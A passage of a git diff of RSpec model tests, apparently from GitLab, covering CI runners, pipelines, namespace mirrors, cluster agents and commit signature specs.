described_class.create!(namespace_id: group3.id, traversal_ids: [group1.id, group2.id, group3.id]) 
+ described_class.create!(namespace_id: group4.id, traversal_ids: [group1.id, group2.id, group3.id, group4.id]) + + group2.update!(parent: nil) + end + + it 'updates hierarchies for the base but wait for events for the children' do + expect { sync }.not_to change { described_class.count } + + expect(group1.reload.ci_namespace_mirror).to have_attributes(traversal_ids: [group1.id]) + expect(group2.reload.ci_namespace_mirror).to have_attributes(traversal_ids: [group2.id]) + expect(group3.reload.ci_namespace_mirror).to have_attributes(traversal_ids: [group2.id, group3.id]) + expect(group4.reload.ci_namespace_mirror).to have_attributes(traversal_ids: [group2.id, group3.id, group4.id]) + end + end + + context 'when the FFs sync_traversal_ids, use_traversal_ids and use_traversal_ids_for_ancestors are disabled' do + before do + stub_feature_flags(sync_traversal_ids: false, + use_traversal_ids: false, + use_traversal_ids_for_ancestors: false) + end + + context 'changing the middle namespace' do + let(:namespace) { group2 } + + before do + described_class.create!(namespace_id: group1.id, traversal_ids: [group1.id]) + described_class.create!(namespace_id: group2.id, traversal_ids: [group1.id, group2.id]) + described_class.create!(namespace_id: group3.id, traversal_ids: [group1.id, group2.id, group3.id]) + described_class.create!(namespace_id: group4.id, traversal_ids: [group1.id, group2.id, group3.id, group4.id]) + + group2.update!(parent: nil) + end + + it 'updates hierarchies for the base and descendants' do + expect { sync }.not_to change { described_class.count } + + expect(group1.reload.ci_namespace_mirror).to have_attributes(traversal_ids: [group1.id]) + expect(group2.reload.ci_namespace_mirror).to have_attributes(traversal_ids: [group2.id]) + expect(group3.reload.ci_namespace_mirror).to have_attributes(traversal_ids: [group2.id, group3.id]) + expect(group4.reload.ci_namespace_mirror).to have_attributes(traversal_ids: [group2.id, group3.id, group4.id]) + end + end + end 
+ end +end diff --git a/spec/models/ci/pending_build_spec.rb b/spec/models/ci/pending_build_spec.rb index ad711f5622f..abf0fb443bb 100644 --- a/spec/models/ci/pending_build_spec.rb +++ b/spec/models/ci/pending_build_spec.rb @@ -118,7 +118,7 @@ RSpec.describe Ci::PendingBuild do project.shared_runners_enabled = true end - context 'when ci_pending_builds_maintain_shared_runners_data is enabled' do + context 'when ci_pending_builds_maintain_denormalized_data is enabled' do it 'sets instance_runners_enabled to true' do described_class.upsert_from_build!(build) @@ -150,9 +150,9 @@ RSpec.describe Ci::PendingBuild do end end - context 'when ci_pending_builds_maintain_shared_runners_data is disabled' do + context 'when ci_pending_builds_maintain_denormalized_data is disabled' do before do - stub_feature_flags(ci_pending_builds_maintain_shared_runners_data: false) + stub_feature_flags(ci_pending_builds_maintain_denormalized_data: false) end it 'sets instance_runners_enabled to false' do @@ -168,7 +168,7 @@ RSpec.describe Ci::PendingBuild do subject(:ci_pending_build) { described_class.last } - context 'when ci_pending_builds_maintain_tags_data is enabled' do + context 'when ci_pending_builds_maintain_denormalized_data is enabled' do it 'sets tag_ids' do described_class.upsert_from_build!(build) @@ -176,9 +176,9 @@ RSpec.describe Ci::PendingBuild do end end - context 'when ci_pending_builds_maintain_tags_data is disabled' do + context 'when ci_pending_builds_maintain_denormalized_data is disabled' do before do - stub_feature_flags(ci_pending_builds_maintain_tags_data: false) + stub_feature_flags(ci_pending_builds_maintain_denormalized_data: false) end it 'does not set tag_ids' do diff --git a/spec/models/ci/pipeline_spec.rb b/spec/models/ci/pipeline_spec.rb index e573a6ef780..fd9970699d7 100644 --- a/spec/models/ci/pipeline_spec.rb +++ b/spec/models/ci/pipeline_spec.rb @@ -28,6 +28,7 @@ RSpec.describe Ci::Pipeline, :mailer, factory_default: :keep do it { is_expected.to 
have_many(:trigger_requests) } it { is_expected.to have_many(:variables) } it { is_expected.to have_many(:builds) } + it { is_expected.to have_many(:statuses_order_id_desc) } it { is_expected.to have_many(:bridges) } it { is_expected.to have_many(:job_artifacts).through(:builds) } it { is_expected.to have_many(:auto_canceled_pipelines) } @@ -35,8 +36,6 @@ RSpec.describe Ci::Pipeline, :mailer, factory_default: :keep do it { is_expected.to have_many(:sourced_pipelines) } it { is_expected.to have_many(:triggered_pipelines) } it { is_expected.to have_many(:pipeline_artifacts) } - it { is_expected.to have_many(:package_build_infos).dependent(:nullify).inverse_of(:pipeline) } - it { is_expected.to have_many(:package_file_build_infos).dependent(:nullify).inverse_of(:pipeline) } it { is_expected.to have_one(:chat_data) } it { is_expected.to have_one(:source_pipeline) } @@ -757,23 +756,23 @@ RSpec.describe Ci::Pipeline, :mailer, factory_default: :keep do context 'with multiple pipelines' do before_all do create(:ci_build, name: "rspec", coverage: 30, pipeline: pipeline) - create(:ci_build, name: "rubocop", coverage: 40, pipeline: pipeline) + create(:ci_build, name: "rubocop", coverage: 35, pipeline: pipeline) end it "calculates average when there are two builds with coverage" do - expect(pipeline.coverage).to eq("35.00") + expect(pipeline.coverage).to be_within(0.001).of(32.5) end it "calculates average when there are two builds with coverage and one with nil" do create(:ci_build, pipeline: pipeline) - expect(pipeline.coverage).to eq("35.00") + expect(pipeline.coverage).to be_within(0.001).of(32.5) end it "calculates average when there are two builds with coverage and one is retried" do create(:ci_build, name: "rubocop", coverage: 30, pipeline: pipeline, retried: true) - expect(pipeline.coverage).to eq("35.00") + expect(pipeline.coverage).to be_within(0.001).of(32.5) end end @@ -1358,12 +1357,26 @@ RSpec.describe Ci::Pipeline, :mailer, factory_default: :keep do describe 
'synching status to Jira' do let(:worker) { ::JiraConnect::SyncBuildsWorker } - %i[prepare! run! skip! drop! succeed! cancel! block! delay!].each do |event| - context "when we call pipeline.#{event}" do - it 'triggers a Jira synch worker' do - expect(worker).to receive(:perform_async).with(pipeline.id, Integer) + context 'when Jira Connect subscription does not exist' do + it 'does not trigger a Jira synch worker' do + expect(worker).not_to receive(:perform_async) - pipeline.send(event) + pipeline.prepare! + end + end + + context 'when Jira Connect subscription exists' do + before_all do + create(:jira_connect_subscription, namespace: project.namespace) + end + + %i[prepare! run! skip! drop! succeed! cancel! block! delay!].each do |event| + context "when we call pipeline.#{event}" do + it 'triggers a Jira synch worker' do + expect(worker).to receive(:perform_async).with(pipeline.id, Integer) + + pipeline.send(event) + end end end end @@ -1503,10 +1516,30 @@ RSpec.describe Ci::Pipeline, :mailer, factory_default: :keep do end describe 'pipeline caching' do - it 'performs ExpirePipelinesCacheWorker' do - expect(ExpirePipelineCacheWorker).to receive(:perform_async).with(pipeline.id) + context 'when expire_job_and_pipeline_cache_synchronously is enabled' do + before do + stub_feature_flags(expire_job_and_pipeline_cache_synchronously: true) + end - pipeline.cancel + it 'executes Ci::ExpirePipelineCacheService' do + expect_next_instance_of(Ci::ExpirePipelineCacheService) do |service| + expect(service).to receive(:execute).with(pipeline) + end + + pipeline.cancel + end + end + + context 'when expire_job_and_pipeline_cache_synchronously is disabled' do + before do + stub_feature_flags(expire_job_and_pipeline_cache_synchronously: false) + end + + it 'performs ExpirePipelinesCacheWorker' do + expect(ExpirePipelineCacheWorker).to receive(:perform_async).with(pipeline.id) + + pipeline.cancel + end end end @@ -3173,11 +3206,35 @@ RSpec.describe Ci::Pipeline, :mailer, 
factory_default: :keep do context 'when pipeline is not child nor parent' do let_it_be(:pipeline) { create(:ci_pipeline, :created) } - let_it_be(:build) { create(:ci_build, :with_deployment, :deploy_to_production, pipeline: pipeline) } + let_it_be(:build, refind: true) { create(:ci_build, :with_deployment, :deploy_to_production, pipeline: pipeline) } it 'returns just the pipeline environment' do expect(subject).to contain_exactly(build.deployment.environment) end + + context 'when deployment SHA is not matched' do + before do + build.deployment.update!(sha: 'old-sha') + end + + it 'does not return environments' do + expect(subject).to be_empty + end + end + end + + context 'when an associated environment does not have deployments' do + let_it_be(:pipeline) { create(:ci_pipeline, :created) } + let_it_be(:build) { create(:ci_build, :stop_review_app, pipeline: pipeline) } + let_it_be(:environment) { create(:environment, project: pipeline.project) } + + before_all do + build.metadata.update!(expanded_environment_name: environment.name) + end + + it 'does not return environments' do + expect(subject).to be_empty + end end context 'when pipeline is in extended family' do @@ -4611,4 +4668,13 @@ RSpec.describe Ci::Pipeline, :mailer, factory_default: :keep do expect(pipeline.authorized_cluster_agents).to contain_exactly(agent) # cached end end + + it_behaves_like 'it has loose foreign keys' do + let(:factory_name) { :ci_pipeline } + end + + it_behaves_like 'cleanup by a loose foreign key' do + let!(:model) { create(:ci_pipeline, user: create(:user)) } + let!(:parent) { model.user } + end end diff --git a/spec/models/ci/project_mirror_spec.rb b/spec/models/ci/project_mirror_spec.rb new file mode 100644 index 00000000000..199285b036c --- /dev/null +++ b/spec/models/ci/project_mirror_spec.rb @@ -0,0 +1,36 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Ci::ProjectMirror do + let_it_be(:group1) { create(:group) } + let_it_be(:group2) { 
create(:group) } + + let!(:project) { create(:project, namespace: group2) } + + describe '.sync!' do + let!(:event) { Projects::SyncEvent.create!(project: project) } + + subject(:sync) { described_class.sync!(event.reload) } + + context 'when project hierarchy does not exist in the first place' do + it 'creates a ci_projects record' do + expect { sync }.to change { described_class.count }.from(0).to(1) + + expect(project.ci_project_mirror).to have_attributes(namespace_id: group2.id) + end + end + + context 'when project hierarchy does already exist' do + before do + described_class.create!(project_id: project.id, namespace_id: group1.id) + end + + it 'updates the related ci_projects record' do + expect { sync }.not_to change { described_class.count } + + expect(project.ci_project_mirror).to have_attributes(namespace_id: group2.id) + end + end + end +end diff --git a/spec/models/ci/runner_namespace_spec.rb b/spec/models/ci/runner_namespace_spec.rb index 4e7cf7a3cb3..41d805adb9f 100644 --- a/spec/models/ci/runner_namespace_spec.rb +++ b/spec/models/ci/runner_namespace_spec.rb @@ -4,12 +4,6 @@ require 'spec_helper' RSpec.describe Ci::RunnerNamespace do it_behaves_like 'includes Limitable concern' do - before do - skip_default_enabled_yaml_check - - stub_feature_flags(ci_runner_limits_override: false) - end - subject { build(:ci_runner_namespace, group: create(:group, :nested), runner: create(:ci_runner, :group)) } end end diff --git a/spec/models/ci/runner_project_spec.rb b/spec/models/ci/runner_project_spec.rb index fef1416a84a..13369dba2cf 100644 --- a/spec/models/ci/runner_project_spec.rb +++ b/spec/models/ci/runner_project_spec.rb @@ -4,12 +4,6 @@ require 'spec_helper' RSpec.describe Ci::RunnerProject do it_behaves_like 'includes Limitable concern' do - before do - skip_default_enabled_yaml_check - - stub_feature_flags(ci_runner_limits_override: false) - end - subject { build(:ci_runner_project, project: create(:project), runner: create(:ci_runner, :project)) } 
end end diff --git a/spec/models/ci/runner_spec.rb b/spec/models/ci/runner_spec.rb index 2e79159cc60..5142f70fa2c 100644 --- a/spec/models/ci/runner_spec.rb +++ b/spec/models/ci/runner_spec.rb @@ -7,10 +7,6 @@ RSpec.describe Ci::Runner do it_behaves_like 'it has loose foreign keys' do let(:factory_name) { :ci_runner } - - before do - Clusters::Applications::Runner # ensure that the referenced model is loaded - end end describe 'groups association' do @@ -298,26 +294,134 @@ RSpec.describe Ci::Runner do describe '.recent' do subject { described_class.recent } + let!(:runner1) { create(:ci_runner, :instance, contacted_at: nil, created_at: 2.months.ago) } + let!(:runner2) { create(:ci_runner, :instance, contacted_at: nil, created_at: 3.months.ago) } + let!(:runner3) { create(:ci_runner, :instance, contacted_at: 1.month.ago, created_at: 2.months.ago) } + let!(:runner4) { create(:ci_runner, :instance, contacted_at: 1.month.ago, created_at: 3.months.ago) } + + it { is_expected.to eq([runner1, runner3, runner4])} + end + + describe '.active' do + subject { described_class.active(active_value) } + + let!(:runner1) { create(:ci_runner, :instance, active: false) } + let!(:runner2) { create(:ci_runner, :instance) } + + context 'with active_value set to false' do + let(:active_value) { false } + + it 'returns inactive runners' do + is_expected.to match_array([runner1]) + end + end + + context 'with active_value set to true' do + let(:active_value) { true } + + it 'returns active runners' do + is_expected.to match_array([runner2]) + end + end + end + + describe '.paused' do before do - @runner1 = create(:ci_runner, :instance, contacted_at: nil, created_at: 2.months.ago) - @runner2 = create(:ci_runner, :instance, contacted_at: nil, created_at: 3.months.ago) - @runner3 = create(:ci_runner, :instance, contacted_at: 1.month.ago, created_at: 2.months.ago) - @runner4 = create(:ci_runner, :instance, contacted_at: 1.month.ago, created_at: 3.months.ago) - @runner5 = create(:ci_runner, 
:instance, contacted_at: 3.months.ago, created_at: 5.months.ago) + expect(described_class).to receive(:active).with(false).and_call_original end - it { is_expected.to eq([@runner1, @runner3, @runner4])} + subject { described_class.paused } + + let!(:runner1) { create(:ci_runner, :instance, active: false) } + let!(:runner2) { create(:ci_runner, :instance) } + + it 'returns inactive runners' do + is_expected.to match_array([runner1]) + end end - describe '.online' do - subject { described_class.online } + describe '.stale' do + subject { described_class.stale } + + let!(:runner1) { create(:ci_runner, :instance, created_at: 4.months.ago, contacted_at: 3.months.ago + 10.seconds) } + let!(:runner2) { create(:ci_runner, :instance, created_at: 4.months.ago, contacted_at: 3.months.ago - 1.second) } + let!(:runner3) { create(:ci_runner, :instance, created_at: 3.months.ago - 1.second, contacted_at: nil) } + let!(:runner4) { create(:ci_runner, :instance, created_at: 2.months.ago, contacted_at: nil) } + + it 'returns stale runners' do + is_expected.to match_array([runner2, runner3]) + end + end + + describe '#stale?', :clean_gitlab_redis_cache do + let(:runner) { create(:ci_runner, :instance) } + + subject { runner.stale? } before do - @runner1 = create(:ci_runner, :instance, contacted_at: 2.hours.ago) - @runner2 = create(:ci_runner, :instance, contacted_at: 1.second.ago) + allow_any_instance_of(described_class).to receive(:cached_attribute).and_call_original + allow_any_instance_of(described_class).to receive(:cached_attribute) + .with(:platform).and_return("darwin") end - it { is_expected.to eq([@runner2])} + context 'table tests' do + using RSpec::Parameterized::TableSyntax + + where(:created_at, :contacted_at, :expected_stale?) 
do + nil | nil | false + 3.months.ago - 1.second | 3.months.ago - 0.001.seconds | true + 3.months.ago - 1.second | 3.months.ago + 1.hour | false + 3.months.ago - 1.second | nil | true + 3.months.ago + 1.hour | nil | false + end + + with_them do + before do + runner.created_at = created_at + end + + context 'no cache value' do + before do + stub_redis_runner_contacted_at(nil) + runner.contacted_at = contacted_at + end + + specify do + is_expected.to eq(expected_stale?) + end + end + + context 'with cache value' do + before do + runner.contacted_at = contacted_at ? contacted_at + 1.week : nil + stub_redis_runner_contacted_at(contacted_at.to_s) + end + + specify do + is_expected.to eq(expected_stale?) + end + end + + def stub_redis_runner_contacted_at(value) + return unless created_at + + Gitlab::Redis::Cache.with do |redis| + cache_key = runner.send(:cache_attribute_key) + expect(redis).to receive(:get).with(cache_key) + .and_return({ contacted_at: value }.to_json).at_least(:once) + end + end + end + end + end + + describe '.online' do + subject { described_class.online } + + let!(:runner1) { create(:ci_runner, :instance, contacted_at: 2.hours.ago) } + let!(:runner2) { create(:ci_runner, :instance, contacted_at: 1.second.ago) } + + it { is_expected.to match_array([runner2]) } end describe '#online?', :clean_gitlab_redis_cache do @@ -344,7 +448,7 @@ RSpec.describe Ci::Runner do it { is_expected.to be_falsey } end - context 'contacted long time ago time' do + context 'contacted long time ago' do before do runner.contacted_at = 1.year.ago end @@ -362,7 +466,7 @@ RSpec.describe Ci::Runner do end context 'with cache value' do - context 'contacted long time ago time' do + context 'contacted long time ago' do before do runner.contacted_at = 1.year.ago stub_redis_runner_contacted_at(1.year.ago.to_s) @@ -393,12 +497,10 @@ RSpec.describe Ci::Runner do describe '.offline' do subject { described_class.offline } - before do - @runner1 = create(:ci_runner, :instance, contacted_at: 
2.hours.ago) - @runner2 = create(:ci_runner, :instance, contacted_at: 1.second.ago) - end + let!(:runner1) { create(:ci_runner, :instance, contacted_at: 2.hours.ago) } + let!(:runner2) { create(:ci_runner, :instance, contacted_at: 1.second.ago) } - it { is_expected.to eq([@runner1])} + it { is_expected.to eq([runner1]) } end describe '#tick_runner_queue' do @@ -626,16 +728,33 @@ RSpec.describe Ci::Runner do end describe '#status' do - let(:runner) { build(:ci_runner, :instance) } + let(:runner) { build(:ci_runner, :instance, created_at: 4.months.ago) } + let(:legacy_mode) { } - subject { runner.status } + subject { runner.status(legacy_mode) } context 'never connected' do before do runner.contacted_at = nil end - it { is_expected.to eq(:not_connected) } + context 'with legacy_mode enabled' do + let(:legacy_mode) { '14.5' } + + it { is_expected.to eq(:not_connected) } + end + + context 'with legacy_mode disabled' do + it { is_expected.to eq(:stale) } + end + + context 'created recently' do + before do + runner.created_at = 1.day.ago + end + + it { is_expected.to eq(:never_contacted) } + end end context 'inactive but online' do @@ -644,7 +763,15 @@ RSpec.describe Ci::Runner do runner.active = false end - it { is_expected.to eq(:online) } + context 'with legacy_mode enabled' do + let(:legacy_mode) { '14.5' } + + it { is_expected.to eq(:paused) } + end + + context 'with legacy_mode disabled' do + it { is_expected.to eq(:online) } + end end context 'contacted 1s ago' do @@ -655,13 +782,29 @@ RSpec.describe Ci::Runner do it { is_expected.to eq(:online) } end - context 'contacted long time ago' do + context 'contacted recently' do before do - runner.contacted_at = 1.year.ago + runner.contacted_at = (3.months - 1.hour).ago end it { is_expected.to eq(:offline) } end + + context 'contacted long time ago' do + before do + runner.contacted_at = (3.months + 1.second).ago + end + + context 'with legacy_mode enabled' do + let(:legacy_mode) { '14.5' } + + it { is_expected.to 
eq(:offline) } + end + + context 'with legacy_mode disabled' do + it { is_expected.to eq(:stale) } + end + end end describe '#deprecated_rest_status' do @@ -760,8 +903,9 @@ RSpec.describe Ci::Runner do describe '#heartbeat' do let(:runner) { create(:ci_runner, :project) } + let(:executor) { 'shell' } - subject { runner.heartbeat(architecture: '18-bit', config: { gpus: "all" }) } + subject { runner.heartbeat(architecture: '18-bit', config: { gpus: "all" }, executor: executor) } context 'when database was updated recently' do before do @@ -797,6 +941,26 @@ RSpec.describe Ci::Runner do expect_redis_update does_db_update end + + %w(custom shell docker docker-windows docker-ssh ssh parallels virtualbox docker+machine docker-ssh+machine kubernetes some-unknown-type).each do |executor| + context "with #{executor} executor" do + let(:executor) { executor } + + it 'updates with expected executor type' do + expect_redis_update + + subject + + expect(runner.reload.read_attribute(:executor_type)).to eq(expected_executor_type) + end + + def expected_executor_type + return 'unknown' if executor == 'some-unknown-type' + + executor.gsub(/[+-]/, '_') + end + end + end end def expect_redis_update @@ -810,6 +974,7 @@ RSpec.describe Ci::Runner do expect { subject }.to change { runner.reload.read_attribute(:contacted_at) } .and change { runner.reload.read_attribute(:architecture) } .and change { runner.reload.read_attribute(:config) } + .and change { runner.reload.read_attribute(:executor_type) } end end @@ -1194,31 +1359,43 @@ RSpec.describe Ci::Runner do end describe '.belonging_to_group' do - it 'returns the specific group runner' do - group = create(:group) - runner = create(:ci_runner, :group, groups: [group]) - unrelated_group = create(:group) - create(:ci_runner, :group, groups: [unrelated_group]) + shared_examples 'returns group runners' do + it 'returns the specific group runner' do + group = create(:group) + runner = create(:ci_runner, :group, groups: [group]) + 
unrelated_group = create(:group) + create(:ci_runner, :group, groups: [unrelated_group]) - expect(described_class.belonging_to_group(group.id)).to contain_exactly(runner) - end + expect(described_class.belonging_to_group(group.id)).to contain_exactly(runner) + end - context 'runner belonging to parent group' do - let_it_be(:parent_group) { create(:group) } - let_it_be(:parent_runner) { create(:ci_runner, :group, groups: [parent_group]) } - let_it_be(:group) { create(:group, parent: parent_group) } + context 'runner belonging to parent group' do + let_it_be(:parent_group) { create(:group) } + let_it_be(:parent_runner) { create(:ci_runner, :group, groups: [parent_group]) } + let_it_be(:group) { create(:group, parent: parent_group) } - context 'when include_parent option is passed' do - it 'returns the group runner from the parent group' do - expect(described_class.belonging_to_group(group.id, include_ancestors: true)).to contain_exactly(parent_runner) + context 'when include_parent option is passed' do + it 'returns the group runner from the parent group' do + expect(described_class.belonging_to_group(group.id, include_ancestors: true)).to contain_exactly(parent_runner) + end end - end - context 'when include_parent option is not passed' do - it 'does not return the group runner from the parent group' do - expect(described_class.belonging_to_group(group.id)).to be_empty + context 'when include_parent option is not passed' do + it 'does not return the group runner from the parent group' do + expect(described_class.belonging_to_group(group.id)).to be_empty + end end end end + + it_behaves_like 'returns group runners' + + context 'when feature flag :linear_runner_ancestor_scopes is disabled' do + before do + stub_feature_flags(linear_runner_ancestor_scopes: false) + end + + it_behaves_like 'returns group runners' + end end end diff --git a/spec/models/ci/stage_spec.rb b/spec/models/ci/stage_spec.rb index 5e0fcb4882f..2b6f22e68f1 100644 --- a/spec/models/ci/stage_spec.rb 
+++ b/spec/models/ci/stage_spec.rb @@ -28,6 +28,18 @@ RSpec.describe Ci::Stage, :models do end end + describe '.by_position' do + it 'finds stages by position' do + a = create(:ci_stage_entity, position: 1) + b = create(:ci_stage_entity, position: 2) + c = create(:ci_stage_entity, position: 3) + + expect(described_class.by_position(1)).to contain_exactly(a) + expect(described_class.by_position(2)).to contain_exactly(b) + expect(described_class.by_position(%w[1 3])).to contain_exactly(a, c) + end + end + describe '.by_name' do it 'finds stages by name' do a = create(:ci_stage_entity, name: 'a') diff --git a/spec/models/clusters/agent_spec.rb b/spec/models/clusters/agent_spec.rb index f9df84e8ff4..3b521086c14 100644 --- a/spec/models/clusters/agent_spec.rb +++ b/spec/models/clusters/agent_spec.rb @@ -75,4 +75,37 @@ RSpec.describe Clusters::Agent do expect(agent.has_access_to?(create(:project))).to be_falsey end end + + describe '#active?' do + let_it_be(:agent) { create(:cluster_agent) } + + let!(:token) { create(:cluster_agent_token, agent: agent, last_used_at: last_used_at) } + + subject { agent.active? 
} + + context 'agent has never connected' do + let(:last_used_at) { nil } + + it { is_expected.to be_falsey } + end + + context 'agent has connected, but not recently' do + let(:last_used_at) { 2.hours.ago } + + it { is_expected.to be_falsey } + end + + context 'agent has connected recently' do + let(:last_used_at) { 2.minutes.ago } + + it { is_expected.to be_truthy } + end + + context 'agent has multiple tokens' do + let!(:inactive_token) { create(:cluster_agent_token, agent: agent, last_used_at: 2.hours.ago) } + let(:last_used_at) { 2.minutes.ago } + + it { is_expected.to be_truthy } + end + end end diff --git a/spec/models/clusters/agent_token_spec.rb b/spec/models/clusters/agent_token_spec.rb index bde4798abec..ad9f948224f 100644 --- a/spec/models/clusters/agent_token_spec.rb +++ b/spec/models/clusters/agent_token_spec.rb @@ -39,7 +39,9 @@ RSpec.describe Clusters::AgentToken do end describe '#track_usage', :clean_gitlab_redis_cache do - let(:agent_token) { create(:cluster_agent_token) } + let_it_be(:agent) { create(:cluster_agent) } + + let(:agent_token) { create(:cluster_agent_token, agent: agent) } subject { agent_token.track_usage } @@ -73,6 +75,34 @@ RSpec.describe Clusters::AgentToken do expect_redis_update end end + + context 'agent is inactive' do + before do + allow(agent).to receive(:active?).and_return(false) + end + + it 'creates an activity event' do + expect { subject }.to change { agent.activity_events.count } + + event = agent.activity_events.last + expect(event).to have_attributes( + kind: 'agent_connected', + level: 'info', + recorded_at: agent_token.reload.read_attribute(:last_used_at), + agent_token: agent_token + ) + end + end + + context 'agent is active' do + before do + allow(agent).to receive(:active?).and_return(true) + end + + it 'does not create an activity event' do + expect { subject }.not_to change { agent.activity_events.count } + end + end end def expect_redis_update diff --git a/spec/models/clusters/agents/activity_event_spec.rb 
b/spec/models/clusters/agents/activity_event_spec.rb new file mode 100644 index 00000000000..18b9c82fa6a --- /dev/null +++ b/spec/models/clusters/agents/activity_event_spec.rb @@ -0,0 +1,32 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Clusters::Agents::ActivityEvent do + it { is_expected.to belong_to(:agent).class_name('Clusters::Agent').required } + it { is_expected.to belong_to(:user).optional } + it { is_expected.to belong_to(:agent_token).class_name('Clusters::AgentToken').optional } + + it { is_expected.to validate_presence_of(:kind) } + it { is_expected.to validate_presence_of(:level) } + it { is_expected.to validate_presence_of(:recorded_at) } + it { is_expected.to nullify_if_blank(:detail) } + + describe 'scopes' do + let_it_be(:agent) { create(:cluster_agent) } + + describe '.in_timeline_order' do + let(:recorded_at) { 1.hour.ago } + + let!(:event1) { create(:agent_activity_event, agent: agent, recorded_at: recorded_at) } + let!(:event2) { create(:agent_activity_event, agent: agent, recorded_at: Time.current) } + let!(:event3) { create(:agent_activity_event, agent: agent, recorded_at: recorded_at) } + + subject { described_class.in_timeline_order } + + it 'sorts by recorded_at: :desc, id: :desc' do + is_expected.to eq([event2, event3, event1]) + end + end + end +end diff --git a/spec/models/clusters/applications/runner_spec.rb b/spec/models/clusters/applications/runner_spec.rb index 806c60d5aff..434d7ad4a90 100644 --- a/spec/models/clusters/applications/runner_spec.rb +++ b/spec/models/clusters/applications/runner_spec.rb @@ -69,66 +69,9 @@ RSpec.describe Clusters::Applications::Runner do expect(values).to include('privileged: true') expect(values).to include('image: ubuntu:16.04') expect(values).to include('resources') - expect(values).to match(/runnerToken: ['"]?#{Regexp.escape(ci_runner.token)}/) expect(values).to match(/gitlabUrl: ['"]?#{Regexp.escape(Gitlab::Routing.url_helpers.root_url)}/) end - context 'without a 
runner' do - let(:application) { create(:clusters_applications_runner, runner: nil, cluster: cluster) } - let(:runner) { application.runner } - - shared_examples 'runner creation' do - it 'creates a runner' do - expect { subject }.to change { Ci::Runner.count }.by(1) - end - - it 'uses the new runner token' do - expect(values).to match(/runnerToken: '?#{Regexp.escape(runner.token)}/) - end - end - - context 'project cluster' do - let(:project) { create(:project) } - let(:cluster) { create(:cluster, :with_installed_helm, projects: [project]) } - - include_examples 'runner creation' - - it 'creates a project runner' do - subject - - runner_projects = Project.where(id: runner.runner_projects.pluck(:project_id)) - expect(runner).to be_project_type - expect(runner_projects).to match_array [project] - end - end - - context 'group cluster' do - let(:group) { create(:group) } - let(:cluster) { create(:cluster, :with_installed_helm, cluster_type: :group_type, groups: [group]) } - - include_examples 'runner creation' - - it 'creates a group runner' do - subject - - expect(runner).to be_group_type - expect(runner.runner_namespaces.pluck(:namespace_id)).to match_array [group.id] - end - end - - context 'instance cluster' do - let(:cluster) { create(:cluster, :with_installed_helm, :instance) } - - include_examples 'runner creation' - - it 'creates an instance runner' do - subject - - expect(runner).to be_instance_type - end - end - end - context 'with duplicated values on vendor/runner/values.yaml' do let(:stub_values) do { diff --git a/spec/models/clusters/platforms/kubernetes_spec.rb b/spec/models/clusters/platforms/kubernetes_spec.rb index a4cae93ff84..b298bf2c8bb 100644 --- a/spec/models/clusters/platforms/kubernetes_spec.rb +++ b/spec/models/clusters/platforms/kubernetes_spec.rb @@ -201,7 +201,7 @@ RSpec.describe Clusters::Platforms::Kubernetes do it { is_expected.to be_an_instance_of(Gitlab::Kubernetes::KubeClient) } context 'ca_pem is a single certificate' do - 
let(:ca_pem) { File.read(Rails.root.join('spec/fixtures/clusters/ca_certificate.pem')) } + let(:ca_pem) { File.read(Rails.root.join('spec/fixtures/clusters/root_certificate.pem')) } let(:kubernetes) do build(:cluster_platform_kubernetes, :configured, @@ -228,21 +228,22 @@ RSpec.describe Clusters::Platforms::Kubernetes do ca_pem: cert_chain) end - it 'includes chain of certificates' do - cert1_file = File.read(Rails.root.join('spec/fixtures/clusters/root_certificate.pem')) - cert1 = OpenSSL::X509::Certificate.new(cert1_file) - - cert2_file = File.read(Rails.root.join('spec/fixtures/clusters/intermediate_certificate.pem')) - cert2 = OpenSSL::X509::Certificate.new(cert2_file) - - cert3_file = File.read(Rails.root.join('spec/fixtures/clusters/ca_certificate.pem')) - cert3 = OpenSSL::X509::Certificate.new(cert3_file) + where(:fixture_path) do + %w[ + spec/fixtures/clusters/root_certificate.pem + spec/fixtures/clusters/intermediate_certificate.pem + spec/fixtures/clusters/leaf_certificate.pem + ] + end - cert_store = kubernetes.kubeclient.kubeclient_options[:ssl_options][:cert_store] + with_them do + it 'includes chain of certificates' do + cert_store = kubernetes.kubeclient.kubeclient_options[:ssl_options][:cert_store] + cert_file = File.read(Rails.root.join(fixture_path)) + certificate = OpenSSL::X509::Certificate.new(cert_file) - expect(cert_store.verify(cert1)).to be true - expect(cert_store.verify(cert2)).to be true - expect(cert_store.verify(cert3)).to be true + expect(cert_store.verify(certificate)).to be true + end end end end diff --git a/spec/models/gpg_signature_spec.rb b/spec/models/commit_signatures/gpg_signature_spec.rb index 7a1799c670e..9646e974f40 100644 --- a/spec/models/gpg_signature_spec.rb +++ b/spec/models/commit_signatures/gpg_signature_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe GpgSignature do +RSpec.describe CommitSignatures::GpgSignature do let(:commit_sha) { '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33' } let!(:project) { 
create(:project, :repository, path: 'sample-project') } let!(:commit) { create(:commit, project: project, sha: commit_sha) } @@ -13,7 +13,7 @@ RSpec.describe GpgSignature do it_behaves_like 'having unique enum values' describe 'associations' do - it { is_expected.to belong_to(:project) } + it { is_expected.to belong_to(:project).required } it { is_expected.to belong_to(:gpg_key) } it { is_expected.to belong_to(:gpg_key_subkey) } end diff --git a/spec/models/x509_commit_signature_spec.rb b/spec/models/commit_signatures/x509_commit_signature_spec.rb index 2efb77c96ad..076f209e1b7 100644 --- a/spec/models/x509_commit_signature_spec.rb +++ b/spec/models/commit_signatures/x509_commit_signature_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe X509CommitSignature do +RSpec.describe CommitSignatures::X509CommitSignature do let(:commit_sha) { '189a6c924013fc3fe40d6f1ec1dc20214183bc97' } let(:project) { create(:project, :public, :repository) } let!(:commit) { create(:commit, project: project, sha: commit_sha) } diff --git a/spec/models/commit_spec.rb b/spec/models/commit_spec.rb index ac0ae17f8f7..2176eea75bc 100644 --- a/spec/models/commit_spec.rb +++ b/spec/models/commit_spec.rb @@ -676,68 +676,18 @@ eos describe '.diff_max_files' do subject(:diff_max_files) { described_class.diff_max_files } - let(:increased_diff_limits) { false } - let(:configurable_diff_limits) { false } - - before do - stub_feature_flags(increased_diff_limits: increased_diff_limits, configurable_diff_limits: configurable_diff_limits) - end - - context 'when increased_diff_limits is enabled' do - let(:increased_diff_limits) { true } - - it 'returns 3000' do - expect(diff_max_files).to eq(3000) - end - end - - context 